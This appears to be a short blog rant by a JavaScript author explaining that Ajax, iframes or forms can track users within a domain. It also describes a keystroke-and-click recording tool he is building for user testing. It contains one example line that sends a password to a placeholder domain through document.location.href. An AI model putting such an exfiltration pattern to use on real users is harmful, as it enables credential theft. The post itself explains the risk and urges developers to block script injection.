Ajax: Spying on users (personal rant)
This is a little rant that I have on a topic I see pop up place to place about using Ajax techniques to spy on you. All I can say to this is yes we can use the XMLhttpRequest object to pass back information without your control. I can monitor every single thing you can do on a website with JavaScript as long as it is in the same domain. The same domain part needs to be stressed since this means a website can not read my passwords on another site.
But the sad thing is this: We can do it without the XMLHttpRequest object. All we need is an iframe, pop up window, or a form. We send information via a link, document.location.href="asdfoyweoryjrbkerbmwnervb.com?pasword=123" or by submitting a form: document.formName.submit();.
You hear developers always saying that they have used these techniques for years. I used it in JavaScript games I developed to transfer high score information. Go to websites you can trust and make sure that you, a developer, disable all JavaScript injections in your guestbook, blogs, wikis, and so on like you do for your SQL databases. We do not need to help others gain information.
Now why would a person use monitoring techniques with Ajax? I have been keeping this quiet, but I thought I would tell the world what I am working on. Some people see monitoring users actions as being very scary situation, for me it is a blessing for testing. I personally started work on developing a tool that can be deployed on an application during the user testing phase of a project. It main purpose is to sit in the background of a webpage and attach itself to the controls on the page. It will monitor all of the users actions and record them based on a timeline. This information is going to be sent to a server to be stored for processing. Mouse movement, key presses, mouse clicks, and so on will be monitored and recorded to a database.
What can we do with this information stored in a database? I am working on a playback feature that will recreate all of the users interactions on the page. Therefore we can see what action caused that error. I know that you ask a user what they did, they just say: "I have no clue." Instead of banging our heads to figure out the chain of events to raise the error, we can watch the 'movie'. I also want to get this little application tied into NUNIT to help record testing scenarios. We never know what the users do exactly, but using their 'movie' will show it exactly.
This tool is going to be a rather large thing to accomplish and it will need a lot of testing in future.
Eric Pascarello
Moderator of HTML/JavaScript at www.JavaRanch.com
Author of: JavaScript: Your Visual Blueprint for Dynamic Web Pages